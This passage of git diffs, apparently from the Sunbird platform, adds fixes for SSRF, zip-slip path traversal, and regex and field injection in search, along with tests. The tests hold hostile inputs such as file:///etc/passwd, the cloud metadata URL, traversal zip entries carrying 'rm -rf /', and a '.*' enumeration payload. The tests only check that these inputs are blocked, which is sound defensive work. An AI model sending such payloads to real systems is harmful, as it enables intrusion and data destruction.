+    public void testBlockPrivate10() {
+        SafeUrlValidator.validate("http://10.0.0.1:8080/");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockPrivate172() {
+        SafeUrlValidator.validate("http://172.16.0.1/internal");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockPrivate192() {
+        SafeUrlValidator.validate("http://192.168.1.1/admin");
+    }
+
+    // === Cloud metadata endpoint (169.254.169.254) ===
+
+    @Test(expected = ClientException.class)
+    public void testBlockCloudMetadata() {
+        SafeUrlValidator.validate("http://169.254.169.254/latest/meta-data/");
+    }
+
+    // === Link-local ===
+
+    @Test(expected = ClientException.class)
+    public void testBlockLinkLocal() {
+        SafeUrlValidator.validate("http://169.254.1.1/");
+    }
+
+    // === Wildcard / unspecified ===
+
+    @Test(expected = ClientException.class)
+    public void testBlockWildcard() {
+        SafeUrlValidator.validate("http://0.0.0.0/");
+    }
+
+    // === Null / blank ===
+
+    @Test(expected = ClientException.class)
+    public void testBlockNull() {
+        SafeUrlValidator.validate(null);
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockEmpty() {
+        SafeUrlValidator.validate("");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testBlockBlank() {
+        SafeUrlValidator.validate("   ");
+    }
+
+    // === Malformed URL ===
+
+    @Test(expected = ClientException.class)
+    public void testBlockMalformedUrl() {
+        SafeUrlValidator.validate("not-a-url");
+    }
+
+    // === Public URLs should pass ===
+
+    @Test
+    public void testAllowPublicHttps() {
+        SafeUrlValidator.validate("https://www.google.com/");
+    }
+
+    @Test
+    public void testAllowPublicUrl2() {
+        SafeUrlValidator.validate("https://github.com/");
+    }
+
+    @Test
+    public void testAllowPublicUrlWithPath() {
+        SafeUrlValidator.validate("https://www.google.com/images/test.png");
+    }
+
+    // === Security report exact payloads ===
+
+    @Test(expected = ClientException.class)
+    public void testSsrfVuln03_FileReadEtcPasswd() {
+        SafeUrlValidator.validate("file:///etc/passwd");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testSsrfVuln03_FileReadEtcHosts() {
+        SafeUrlValidator.validate("file:///etc/hosts");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testSsrfVuln03_InternalServiceProbe() {
+        SafeUrlValidator.validate("http://127.0.0.1:9000/health");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testSsrfVuln03_ElasticsearchProbe() {
+        SafeUrlValidator.validate("http://127.0.0.1:9200/");
+    }
+
+    @Test(expected = ClientException.class)
+    public void testSsrfVuln07_InternalNetworkScan() {
+        SafeUrlValidator.validate("http://10.255.255.1:9999/dead");
+    }
+
+    // === Error message validation ===
+
+    @Test
+    public void testFileProtocolErrorMessage() {
+        try {
+            SafeUrlValidator.validate("file:///etc/passwd");
+            Assert.fail("Should throw");
+        } catch (ClientException e) {
+            Assert.assertEquals("ERR_BLOCKED_URL_PROTOCOL", e.getErrCode());
+            Assert.assertTrue(e.getMessage().contains("file"));
+        }
+    }
+
+    @Test
+    public void testLoopbackErrorMessage() {
+        try {
+            SafeUrlValidator.validate("http://127.0.0.1/");
+            Assert.fail("Should throw");
+        } catch (ClientException e) {
+            Assert.assertEquals("ERR_BLOCKED_URL_IP", e.getErrCode());
+            Assert.assertTrue(e.getMessage().contains("loopback"));
+        }
+    }
+
+    @Test
+    public void testPrivateNetErrorMessage() {
+        try {
+            SafeUrlValidator.validate("http://10.0.0.1/");
+            Assert.fail("Should throw");
+        } catch (ClientException e) {
+            Assert.assertEquals("ERR_BLOCKED_URL_IP", e.getErrCode());
+            Assert.assertTrue(e.getMessage().contains("private"));
+        }
+    }
+}

--- a/platform-core/schema-validator/src/main/java/org/sunbird/schema/impl/BaseSchemaValidator.java
+++ b/platform-core/schema-validator/src/main/java/org/sunbird/schema/impl/BaseSchemaValidator.java
@@ -84,6 +84,7 @@ public abstract class BaseSchemaValidator implements ISchemaValidator {
     }
 
     public ValidationResult getStructuredData(Map<String, Object> input) {
+        HtmlSanitizer.sanitizeMap(input);
         Map<String, Object> relations = getRelations(input);
         Map<String, Object> externalData = getExternalProps(input);
         return new ValidationResult(input, relations, externalData);

--- a/platform-core/schema-validator/src/main/java/org/sunbird/schema/impl/BaseSchemaValidator.java
+++ b/platform-core/schema-validator/src/main/java/org/sunbird/schema/impl/BaseSchemaValidator.java
@@ -12,6 +12,7 @@ import org.leadpony.justify.api.JsonValidationService;
 import org.leadpony.justify.api.ProblemHandler;
 import org.leadpony.justify.api.ValidationConfig;
 import org.leadpony.justify.internal.schema.BasicJsonSchema;
+import org.sunbird.common.HtmlSanitizer;
 import org.sunbird.common.JsonUtils;
 import org.sunbird.schema.ISchemaValidator;
 import org.sunbird.schema.dto.ValidationResult;
@@ -89,6 +90,7 @@ public abstract class BaseSchemaValidator implements ISchemaValidator {
     }
 
     public ValidationResult validate(Map<String, Object> data) throws Exception {
+        HtmlSanitizer.sanitizeMap(data);
         String dataWithDefaults = withDefaultValues(JsonUtils.serialize(data));
         Map<String, Object> validationDataWithDefaults = cleanEmptyKeys(
                 JsonUtils.deserialize(dataWithDefaults, Map.class));

--- a/platform-modules/import-manager/src/main/scala/org/sunbird/object/importer/ImportManager.scala
+++ b/platform-modules/import-manager/src/main/scala/org/sunbird/object/importer/ImportManager.scala
@@ -94,6 +94,7 @@ class ImportManager(config: ImportConfig) {
 
 	def getMetadata(source: String, key: String)(implicit oec: OntologyEngineContext, ec: ExecutionContext): util.Map[String, AnyRef] = {
 		if (StringUtils.isNotBlank(source)) {
+			org.sunbird.common.SafeUrlValidator.validate(source)
 			val response: Response = oec.httpUtil.get(source, "", new util.HashMap[String, String]())
 			if (null != response && response.getResponseCode.code() == 200)
 				response.getResult.getOrDefault(key, new util.HashMap[String, AnyRef]()).asInstanceOf[util.Map[String, AnyRef]]

--- a/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/ecml/processor/LocalizeAssetProcessor.scala
+++ b/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/ecml/processor/LocalizeAssetProcessor.scala
@@ -61,6 +61,7 @@ trait LocalizeAssetProcessor extends IProcessor {
 	}
 
 	def downloadFile(downloadPath: String, fileUrl: String): File = try {
+		org.sunbird.common.SafeUrlValidator.validate(fileUrl)
 		createDirectory(downloadPath)
 		val file = new File(downloadPath + File.separator + getFileNameFromURL(fileUrl))
 		FileUtils.copyURLToFile(new URL(fileUrl), file)

--- a/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManager.scala
+++ b/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManager.scala
@@ -134,9 +134,15 @@ class BaseMimeTypeManager(implicit ss: StorageService) {
 	}
 
 	def extractPackage(file: File, basePath: String) = {
+		val baseDir = Paths.get(basePath).normalize()
+		Files.createDirectories(baseDir)
+		val resolvedBaseDir = baseDir.toRealPath()
 		val zipFile = new ZipFile(file)
 		for (entry <- zipFile.entries().asScala) {
-			val path = Paths.get(basePath + File.separator + entry.getName)
+			val path = resolvedBaseDir.resolve(entry.getName).normalize()
+			if (!path.startsWith(resolvedBaseDir))
+				throw new ClientException("ERR_INVALID_ZIP_ENTRY",
+					"Zip entry attempts path traversal: " + entry.getName)
 			if (entry.isDirectory) Files.createDirectories(path)
 			else {
 				Files.createDirectories(path.getParent)

--- a/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManager.scala
+++ b/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManager.scala
@@ -92,6 +92,7 @@ class BaseMimeTypeManager(implicit ss: StorageService) {
 	}
 
 	def copyURLToFile(objectId: String, fileUrl: String): File = try {
+		org.sunbird.common.SafeUrlValidator.validate(fileUrl)
 		val fileName = getBasePath(objectId) + File.separator + getFileNameFromURL(fileUrl)
 		val file = new File(fileName)
 		FileUtils.copyURLToFile(new URL(fileUrl), file)

--- a/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManager.scala
+++ b/platform-modules/mimetype-manager/src/main/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManager.scala
@@ -139,16 +139,20 @@ class BaseMimeTypeManager(implicit ss: StorageService) {
 		Files.createDirectories(baseDir)
 		val resolvedBaseDir = baseDir.toRealPath()
 		val zipFile = new ZipFile(file)
-		for (entry <- zipFile.entries().asScala) {
-			val path = resolvedBaseDir.resolve(entry.getName).normalize()
-			if (!path.startsWith(resolvedBaseDir))
-				throw new ClientException("ERR_INVALID_ZIP_ENTRY",
-					"Zip entry attempts path traversal: " + entry.getName)
-			if (entry.isDirectory) Files.createDirectories(path)
-			else {
-				Files.createDirectories(path.getParent)
-				Files.copy(zipFile.getInputStream(entry), path)
+		try {
+			for (entry <- zipFile.entries().asScala) {
+				val path = resolvedBaseDir.resolve(entry.getName).normalize()
+				if (!path.startsWith(resolvedBaseDir))
+					throw new ClientException("ERR_INVALID_ZIP_ENTRY",
+						"Zip entry attempts path traversal: " + entry.getName)
+				if (entry.isDirectory) Files.createDirectories(path)
+				else {
+					Files.createDirectories(path.getParent)
+					Files.copy(zipFile.getInputStream(entry), path)
+				}
 			}
+		} finally {
+			zipFile.close()
 		}
 	}
 

--- a/platform-modules/mimetype-manager/src/test/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManagerTest.scala
+++ b/platform-modules/mimetype-manager/src/test/scala/org/sunbird/mimetype/mgr/BaseMimeTypeManagerTest.scala
@@ -1,0 +1,115 @@
+package org.sunbird.mimetype.mgr
+
+import org.scalamock.scalatest.MockFactory
+import org.scalatest.{FlatSpec, Matchers}
+import org.sunbird.cloudstore.StorageService
+import org.sunbird.common.exception.ClientException
+
+import java.io.{File, FileOutputStream}
+import java.nio.file.{Files, Paths}
+import java.util.zip.{ZipEntry, ZipOutputStream}
+
+class BaseMimeTypeManagerTest extends FlatSpec with Matchers with MockFactory {
+
+  implicit val ss: StorageService = mock[StorageService]
+
+  val manager = new BaseMimeTypeManager()
+
+  "extractPackage" should "extract valid zip entries within basePath" in {
+    val (zipFile, basePath) = createTestZip(Map("index.html" -> "hello", "assets/style.css" -> "body{}"))
+    try {
+      manager.extractPackage(zipFile, basePath)
+      new File(basePath + "/index.html").exists() shouldBe true
+      new File(basePath + "/assets/style.css").exists() shouldBe true
+    } finally {
+      deleteDir(new File(basePath))
+      zipFile.delete()
+    }
+  }
+
+  it should "block zip entry with ../ path traversal" in {
+    val (zipFile, basePath) = createTestZip(Map("../../etc/evil" -> "malicious"))
+    try {
+      val ex = intercept[ClientException] {
+        manager.extractPackage(zipFile, basePath)
+      }
+      ex.getMessage should include("path traversal")
+    } finally {
+      deleteDir(new File(basePath))
+      zipFile.delete()
+    }
+  }
+
+  it should "block zip entry with deep traversal" in {
+    val (zipFile, basePath) = createTestZip(Map("../../../tmp/evil.sh" -> "#!/bin/sh\nrm -rf /"))
+    try {
+      val ex = intercept[ClientException] {
+        manager.extractPackage(zipFile, basePath)
+      }
+      ex.getMessage should include("path traversal")
+    } finally {
+      deleteDir(new File(basePath))
+      zipFile.delete()
+    }
+  }
+
+  it should "block absolute path in zip entry" in {
+    val (zipFile, basePath) = createTestZip(Map("/tmp/absolute_write" -> "danger"))
+    try {
+      val ex = intercept[ClientException] {
+        manager.extractPackage(zipFile, basePath)
+      }
+      ex.getMessage should include("path traversal")
+    } finally {
+      deleteDir(new File(basePath))
+      zipFile.delete()
+    }
+  }
+
+  it should "allow nested directories within basePath" in {
+    val (zipFile, basePath) = createTestZip(Map("a/b/c/deep.txt" -> "ok"))
+    try {
+      manager.extractPackage(zipFile, basePath)
+      new File(basePath + "/a/b/c/deep.txt").exists() shouldBe true
+    } finally {
+      deleteDir(new File(basePath))
+      zipFile.delete()
+    }
+  }
+
+  it should "block entry that normalizes outside basePath" in {
+    // "safe/../../../etc/passwd" normalizes to outside basePath
+    val (zipFile, basePath) = createTestZip(Map("safe/../../../etc/passwd" -> "root:x:0:0"))
+    try {
+      val ex = intercept[ClientException] {
+        manager.extractPackage(zipFile, basePath)
+      }
+      ex.getMessage should include("path traversal")
+    } finally {
+      deleteDir(new File(basePath))
+      zipFile.delete()
+    }
+  }
+
+  private def createTestZip(entries: Map[String, String]): (File, String) = {
+    val basePath = Files.createTempDirectory("zipslip_test_").toString
+    val zipFile = File.createTempFile("test_", ".zip")
+    val zos = new ZipOutputStream(new FileOutputStream(zipFile))
+    entries.foreach { case (name, content) =>
+      zos.putNextEntry(new ZipEntry(name))
+      zos.write(content.getBytes)
+      zos.closeEntry()
+    }
+    zos.close()
+    (zipFile, basePath)
+  }
+
+  private def deleteDir(dir: File): Unit = {
+    if (dir.exists()) {
+      Option(dir.listFiles()).foreach(_.foreach { f =>
+        if (f.isDirectory) deleteDir(f) else f.delete()
+      })
+      dir.delete()
+    }
+  }
+}

--- a/platform-modules/url-manager/src/main/java/org/sunbird/url/util/HTTPUrlUtil.java
+++ b/platform-modules/url-manager/src/main/java/org/sunbird/url/util/HTTPUrlUtil.java
@@ -7,6 +7,8 @@ import org.sunbird.common.exception.ServerException;
 import org.sunbird.telemetry.logger.TelemetryManager;
 import org.sunbird.url.common.URLErrorCodes;
 
+import org.sunbird.common.SafeUrlValidator;
+
 import java.io.*;
 import java.net.*;
 import java.util.HashMap;
@@ -27,6 +29,7 @@ public class HTTPUrlUtil {
 	 * @return Map<String, Object>
 	 */
 	public static Map<String, Object> getMetadata(String fileUrl) {
+		SafeUrlValidator.validate(fileUrl);
 		URLConnection conn = null;
 		Map<String, Object> metadata = new HashMap<>();
 		try {
@@ -64,6 +67,7 @@ public class HTTPUrlUtil {
 	 *            path of the directory to save the file
 	 */
 	public static File downloadFile(String fileURL, String saveDir) {
+		SafeUrlValidator.validate(fileURL);
 		HttpURLConnection httpConn = null;
 		InputStream inputStream = null;
 		FileOutputStream outputStream = null;

--- a/search-api/search-actors/src/main/java/org/sunbird/actors/SearchBaseActor.java
+++ b/search-api/search-actors/src/main/java/org/sunbird/actors/SearchBaseActor.java
@@ -21,6 +21,7 @@ import org.sunbird.common.exception.ServerException;
 import org.sunbird.search.dto.SearchDTO;
 import org.sunbird.search.util.DefinitionUtil;
 import org.sunbird.search.util.SearchConstants;
+import org.sunbird.search.util.SearchInputValidator;
 import org.sunbird.telemetry.logger.TelemetryManager;
 import scala.concurrent.Future;
 
@@ -262,6 +263,7 @@ public abstract class SearchBaseActor extends AbstractActor {
             Map<String, Object> softConstraints = null;
             if (null != req.get(SearchConstants.softConstraints)) {
                 softConstraints = (Map<String, Object>) req.get(SearchConstants.softConstraints);
+                SearchInputValidator.validateSoftConstraints(softConstraints);
             }
 
             String mode = (String) req.get(SearchConstants.mode);
@@ -316,6 +318,10 @@ public abstract class SearchBaseActor extends AbstractActor {
             List<String> fieldsSearch = getList(req.get(SearchConstants.fields));
             List<String> facets = getList(req.get(SearchConstants.facets));
             Map<String, String> sortBy = (Map<String, String>) req.get(SearchConstants.sort_by);
+            SearchInputValidator.validateFacets(facets);
+            SearchInputValidator.validateSortBy(sortBy);
+            SearchInputValidator.validateExistsFields(exists);
+            SearchInputValidator.validateExistsFields(notExists);
             properties.addAll(getAdditionalFilterProperties(exists, SearchConstants.exists));
             properties.addAll(getAdditionalFilterProperties(notExists, SearchConstants.not_exists));
             // Changing fields to null so that search all fields but returns

--- a/search-api/search-core/src/main/java/org/sunbird/search/client/ElasticSearchUtil.java
+++ b/search-api/search-core/src/main/java/org/sunbird/search/client/ElasticSearchUtil.java
@@ -9,7 +9,11 @@ import com.fasterxml.jackson.databind.ObjectMapper;
 import org.apache.commons.collections.CollectionUtils;
 import org.apache.commons.lang3.StringUtils;
 import org.apache.http.HttpHost;
+import org.apache.http.auth.AuthScope;
+import org.apache.http.auth.UsernamePasswordCredentials;
+import org.apache.http.client.CredentialsProvider;
 import org.apache.http.client.config.RequestConfig;
+import org.apache.http.impl.client.BasicCredentialsProvider;
 import org.apache.http.util.EntityUtils;
 import org.opensearch.action.support.master.AcknowledgedResponse;
 import org.opensearch.client.*;
@@ -98,17 +102,35 @@ public class ElasticSearchUtil {
 			for (String info : connectionInfo.split(",")) {
 				hostPort.put(info.split(":")[0], Integer.valueOf(info.split(":")[1]));
 			}
-			List<HttpHost> httpHosts = new ArrayList<>();
-			for (String host : hostPort.keySet()) {
-				httpHosts.add(new HttpHost(host, hostPort.get(host)));
-			}
-			RestClientBuilder builder = RestClient.builder(httpHosts.toArray(new HttpHost[httpHosts.size()]))
+			// Use HTTPS scheme if configured
+		String scheme = Platform.config.hasPath("search.es_scheme")
+				? Platform.config.getString("search.es_scheme") : "http";
+		List<HttpHost> secureHosts = new ArrayList<>();
+		for (String host : hostPort.keySet()) {
+			secureHosts.add(new HttpHost(host, hostPort.get(host), scheme));
+		}
+
+		RestClientBuilder builder = RestClient.builder(secureHosts.toArray(new HttpHost[secureHosts.size()]))
 					.setRequestConfigCallback(new RestClientBuilder.RequestConfigCallback() {
 						@Override
 						public RequestConfig.Builder customizeRequestConfig(RequestConfig.Builder requestConfigBuilder) {
 							return requestConfigBuilder.setConnectionRequestTimeout(-1);
 						}
 					});
+
+			// Add authentication if configured
+			String esUsername = Platform.config.hasPath("search.es_username")
+					? Platform.config.getString("search.es_username") : "";
+			String esPassword = Platform.config.hasPath("search.es_password")
+					? Platform.config.getString("search.es_password") : "";
+			if (!esUsername.isEmpty() && !esPassword.isEmpty()) {
+				final CredentialsProvider credentialsProvider = new BasicCredentialsProvider();
+				credentialsProvider.setCredentials(AuthScope.ANY,
+						new UsernamePasswordCredentials(esUsername, esPassword));
+				builder.setHttpClientConfigCallback(httpClientBuilder ->
+						httpClientBuilder.setDefaultCredentialsProvider(credentialsProvider));
+			}
+
 			RestHighLevelClient client = new RestHighLevelClient(builder);
 			if (null != client)
 				esClient.put(indexName, client);

--- a/search-api/search-core/src/main/java/org/sunbird/search/processor/SearchProcessor.java
+++ b/search-api/search-core/src/main/java/org/sunbird/search/processor/SearchProcessor.java
@@ -29,6 +29,7 @@ import org.opensearch.search.builder.SearchSourceBuilder;
 import org.opensearch.search.sort.NestedSortBuilder;
 import org.opensearch.search.sort.SortBuilders;
 import org.opensearch.search.sort.SortOrder;
+import org.sunbird.search.util.SearchInputValidator;
 import org.sunbird.common.Platform;
 import org.sunbird.search.client.ElasticSearchUtil;
 import org.sunbird.search.dto.SearchDTO;
@@ -726,7 +727,7 @@ public class SearchProcessor {
 	private QueryBuilder getMatchPhraseQuery(String propertyName, List<Object> values, boolean match) {
 		BoolQueryBuilder queryBuilder = QueryBuilders.boolQuery();
 		for (Object value : values) {
-			String stringValue = String.valueOf(value);
+			String stringValue = SearchInputValidator.escapeRegexValue(String.valueOf(value));
 			if (match) {
 				queryBuilder.should(QueryBuilders
 						.regexpQuery(propertyName,
@@ -748,7 +749,7 @@ public class SearchProcessor {
 	private QueryBuilder getRegexQuery(String propertyName, List<Object> values) {
 		BoolQueryBuilder queryBuilder = QueryBuilders.boolQuery();
 		for (Object value : values) {
-			String stringValue = String.valueOf(value);
+			String stringValue = SearchInputValidator.escapeRegexValue(String.valueOf(value));
 			queryBuilder.should(QueryBuilders.regexpQuery(propertyName,
 					".*" + stringValue.toLowerCase()));
 		}

--- a/search-api/search-core/src/main/java/org/sunbird/search/util/SearchInputValidator.java
+++ b/search-api/search-core/src/main/java/org/sunbird/search/util/SearchInputValidator.java
@@ -19,7 +19,7 @@ public class SearchInputValidator {
             "channel", "framework", "board", "medium", "gradeLevel", "subject",
             "resourceType", "audience", "license", "language", "domain",
             "targetFWIds", "se_boards", "se_mediums", "se_gradeLevels", "se_subjects",
-            "visibility", "compatibilityLevel", "mediaType", "origin"
+            "visibility", "compatibilityLevel", "mediaType", "origin", "createdBy"
     ));
 
     private static final Set<String> DEFAULT_SORT_FIELDS = new HashSet<>(Arrays.asList(

--- a/search-api/search-core/src/main/java/org/sunbird/search/util/SearchInputValidator.java
+++ b/search-api/search-core/src/main/java/org/sunbird/search/util/SearchInputValidator.java
@@ -1,0 +1,130 @@
+package org.sunbird.search.util;
+
+import org.apache.commons.lang3.StringUtils;
+import org.sunbird.common.Platform;
+import org.sunbird.common.exception.ClientException;
+
+import java.util.Arrays;
+import java.util.Collections;
+import java.util.HashSet;
+import java.util.List;
+import java.util.Map;
+import java.util.Set;
+import java.util.regex.Pattern;
+
+public class SearchInputValidator {
+
+    private static final Set<String> DEFAULT_FACET_FIELDS = new HashSet<>(Arrays.asList(
+            "objectType", "contentType", "status", "mimeType", "primaryCategory",
+            "channel", "framework", "board", "medium", "gradeLevel", "subject",
+            "resourceType", "audience", "license", "language", "domain",
+            "targetFWIds", "se_boards", "se_mediums", "se_gradeLevels", "se_subjects",
+            "visibility", "compatibilityLevel", "mediaType", "origin"
+    ));
+
+    private static final Set<String> DEFAULT_SORT_FIELDS = new HashSet<>(Arrays.asList(
+            "name", "lastUpdatedOn", "createdOn", "pkgVersion", "identifier",
+            "objectType", "contentType", "status", "mimeType", "primaryCategory",
+            "lastPublishedOn", "lastSubmittedOn", "rating", "me_averageRating"
+    ));
+
+    private static final Set<String> DEFAULT_EXISTS_FIELDS = new HashSet<>(Arrays.asList(
+            "name", "description", "status", "mimeType", "primaryCategory", "objectType",
+            "contentType", "channel", "framework", "board", "medium", "gradeLevel",
+            "subject", "artifactUrl", "downloadUrl", "variants", "pkgVersion",
+            "audience", "license", "language", "lastPublishedOn", "identifier",
+            "createdOn", "lastUpdatedOn", "resourceType", "appIcon", "posterImage",
+            "visibility", "compatibilityLevel", "mediaType", "origin", "rating"
+    ));
+
+    private static final Set<String> ALLOWED_FACET_FIELDS;
+    private static final Set<String> ALLOWED_SORT_FIELDS;
+    private static final Set<String> ALLOWED_EXISTS_FIELDS;
+    private static final int MAX_FACETS;
+    private static final int MAX_SORT_FIELDS;
+    private static final int MAX_EXISTS_FIELDS;
+
+    static {
+        ALLOWED_FACET_FIELDS = loadConfiguredFields("search.allowed.facet.fields", DEFAULT_FACET_FIELDS);
+        ALLOWED_SORT_FIELDS = loadConfiguredFields("search.allowed.sort.fields", DEFAULT_SORT_FIELDS);
+        ALLOWED_EXISTS_FIELDS = loadConfiguredFields("search.allowed.exists.fields", DEFAULT_EXISTS_FIELDS);
+        MAX_FACETS = getConfigInt("search.max.facets", 20);
+        MAX_SORT_FIELDS = getConfigInt("search.max.sort.fields", 5);
+        MAX_EXISTS_FIELDS = getConfigInt("search.max.exists.fields", 10);
+    }
+
+    private static Set<String> loadConfiguredFields(String configKey, Set<String> defaults) {
+        try {
+            if (Platform.config.hasPath(configKey)) {
+                List<String> configured = Platform.config.getStringList(configKey);
+                if (configured != null && !configured.isEmpty()) {
+                    return Collections.unmodifiableSet(new HashSet<>(configured));
+                }
+            }
+        } catch (Exception e) {
+            // Config not available or parse error — use defaults
+        }
+        return Collections.unmodifiableSet(defaults);
+    }
+
+    private static int getConfigInt(String configKey, int defaultValue) {
+        try {
+            if (Platform.config.hasPath(configKey)) {
+                return Platform.config.getInt(configKey);
+            }
+        } catch (Exception e) {
+            // Config not available — use default
+        }
+        return defaultValue;
+    }
+
+    private static final Pattern REGEX_METACHAR = Pattern.compile("[.?+*|{}\\[\\]()\\\\^$]");
+
+    public static String escapeRegexValue(String input) {
+        if (StringUtils.isBlank(input)) return input;
+        return REGEX_METACHAR.matcher(input).replaceAll("\\\\$0");
+    }
+
+    public static void validateFacets(List<String> facets) {
+        if (facets == null || facets.isEmpty()) return;
+        if (facets.size() > MAX_FACETS)
+            throw new ClientException("ERR_INVALID_FACETS", "Maximum " + MAX_FACETS + " facets allowed");
+        for (String facet : facets) {
+            if (!ALLOWED_FACET_FIELDS.contains(facet))
+                throw new ClientException("ERR_INVALID_FACETS", "Facet field not allowed: " + facet);
+        }
+    }
+
+    public static void validateSortBy(Map<String, String> sortBy) {
+        if (sortBy == null || sortBy.isEmpty()) return;
+        if (sortBy.size() > MAX_SORT_FIELDS)
+            throw new ClientException("ERR_INVALID_SORT", "Maximum " + MAX_SORT_FIELDS + " sort fields allowed");
+        for (Map.Entry<String, String> entry : sortBy.entrySet()) {
+            if (!ALLOWED_SORT_FIELDS.contains(entry.getKey()))
+                throw new ClientException("ERR_INVALID_SORT", "Sort field not allowed: " + entry.getKey());
+            String dir = entry.getValue();
+            if (dir != null && !dir.equalsIgnoreCase("asc") && !dir.equalsIgnoreCase("desc"))
+                throw new ClientException("ERR_INVALID_SORT", "Sort direction must be 'asc' or 'desc'");
+        }
+    }
+
+    public static void validateExistsFields(List<String> fields) {
+        if (fields == null || fields.isEmpty()) return;
+        if (fields.size() > MAX_EXISTS_FIELDS)
+            throw new ClientException("ERR_INVALID_EXISTS", "Maximum " + MAX_EXISTS_FIELDS + " exists fields allowed");
+        for (String field : fields) {
+            if (!ALLOWED_EXISTS_FIELDS.contains(field))
+                throw new ClientException("ERR_INVALID_EXISTS", "Exists field not allowed: " + field);
+        }
+    }
+
+    public static void validateSoftConstraints(Map<String, Object> softConstraints) {
+        if (softConstraints == null || softConstraints.isEmpty()) return;
+        for (Map.Entry<String, Object> entry : softConstraints.entrySet()) {
+            String key = entry.getKey();
+            if (key.contains(".") || key.contains("[") || key.contains("{"))
+                throw new ClientException("ERR_INVALID_SOFT_CONSTRAINTS",
+                        "Invalid soft constraint field: " + key);
+        }
+    }
+}

--- a/search-api/search-core/src/main/java/org/sunbird/search/util/SearchInputValidator.java
+++ b/search-api/search-core/src/main/java/org/sunbird/search/util/SearchInputValidator.java
@@ -122,9 +122,9 @@ public class SearchInputValidator {
         if (softConstraints == null || softConstraints.isEmpty()) return;
         for (Map.Entry<String, Object> entry : softConstraints.entrySet()) {
             String key = entry.getKey();
-            if (key.contains(".") || key.contains("[") || key.contains("{"))
+            if (!ALLOWED_EXISTS_FIELDS.contains(key))
                 throw new ClientException("ERR_INVALID_SOFT_CONSTRAINTS",
-                        "Invalid soft constraint field: " + key);
+                        "Soft constraint field not allowed: " + key);
         }
     }
 }

--- a/search-api/search-core/src/test/java/org/sunbird/search/util/SearchInputValidatorTest.java
+++ b/search-api/search-core/src/test/java/org/sunbird/search/util/SearchInputValidatorTest.java
@@ -1,0 +1,200 @@
+package org.sunbird.search.util;
+
+import org.junit.Assert;
+import org.junit.Test;
+import org.sunbird.common.exception.ClientException;
+
+import java.util.Arrays;
+import java.util.Collections;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+
+public class SearchInputValidatorTest {
+
+    // === escapeRegexValue tests (INJ-VULN-01, INJ-VULN-02) ===
+
+    @Test
+    public void testEscapeRegexWildcard() {
+        String result = SearchInputValidator.escapeRegexValue(".*");
+        Assert.assertEquals("\\.\\*", result);
+    }
+
+    @Test
+    public void testEscapeRegexDot() {
+        String result = SearchInputValidator.escapeRegexValue("test.value");
+        Assert.assertEquals("test\\.value", result);
+    }
+
+    @Test
+    public void testEscapeRegexPipe() {
+        String result = SearchInputValidator.escapeRegexValue("a|b");
+        Assert.assertEquals("a\\|b", result);
+    }
+
+    @Test
+    public void testEscapeRegexBrackets() {
+        String result = SearchInputValidator.escapeRegexValue("[a-z]");
+        Assert.assertEquals("\\[a-z\\]", result);
+    }
+
+    @Test
+    public void testEscapeRegexParentheses() {
+        String result = SearchInputValidator.escapeRegexValue("(group)");
+        Assert.assertEquals("\\(group\\)", result);
+    }
+
+    @Test
+    public void testEscapeRegexPlainText() {
+        String result = SearchInputValidator.escapeRegexValue("normal text");
+        Assert.assertEquals("normal text", result);
+    }
+
+    @Test
+    public void testEscapeRegexNull() {
+        Assert.assertNull(SearchInputValidator.escapeRegexValue(null));
+    }
+
+    @Test
+    public void testEscapeRegexEmpty() {
+        Assert.assertEquals("", SearchInputValidator.escapeRegexValue(""));
+    }
+
+    @Test
+    public void testEscapeRegexFullEnumerationPayload() {
+        // INJ-VULN-01: attacker sends ".*" as contains value to dump entire index
+        String result = SearchInputValidator.escapeRegexValue(".*");
+        Assert.assertFalse(result.equals(".*"));
+        Assert.assertEquals("\\.\\*", result);
+    }
+
+    @Test
+    public void testEscapeRegexComplexPayload() {
+        String result = SearchInputValidator.escapeRegexValue(".*test{1,2}[abc]");
+        // Wildcards and brackets must be escaped
+        Assert.assertFalse(result.startsWith(".*"));
+        Assert.assertFalse(result.contains("[abc]"));
+        Assert.assertTrue(result.contains("\\.\\*"));
+        Assert.assertTrue(result.contains("\\[abc\\]"));
+    }
+
+    // === validateFacets tests (INJ-VULN-03) ===
+
+    @Test
+    public void testValidFacets() {
+        List<String> facets = Arrays.asList("objectType", "status", "mimeType");
+        SearchInputValidator.validateFacets(facets); // should not throw
+    }
+
+    @Test
+    public void testNullFacets() {
+        SearchInputValidator.validateFacets(null); // should not throw
+    }
+
+    @Test
+    public void testEmptyFacets() {
+        SearchInputValidator.validateFacets(Collections.emptyList()); // should not throw
+    }
+
+    @Test(expected = ClientException.class)
+    public void testInvalidFacetField() {
+        // INJ-VULN-03: attacker probes arbitrary field names via facets
+        List<String> facets = Arrays.asList("objectType", "_internal_field");
+        SearchInputValidator.validateFacets(facets);
+    }
+
+    @Test(expected = ClientException.class)
+    public void testFacetFieldProbing() {
+        List<String> facets = Arrays.asList("password", "secretKey");
+        SearchInputValidator.validateFacets(facets);
+    }
+
+    // === validateSortBy tests (INJ-VULN-04) ===
+
+    @Test
+    public void testValidSortBy() {
+        Map<String, String> sortBy = new HashMap<>();
+        sortBy.put("name", "asc");
+        sortBy.put("lastUpdatedOn", "desc");
+        SearchInputValidator.validateSortBy(sortBy); // should not throw
+    }
+
+    @Test
+    public void testNullSortBy() {
+        SearchInputValidator.validateSortBy(null); // should not throw
+    }
+
+    @Test(expected = ClientException.class)
+    public void testInvalidSortField() {
+        // INJ-VULN-04: attacker uses invalid sort fields to leak infrastructure info
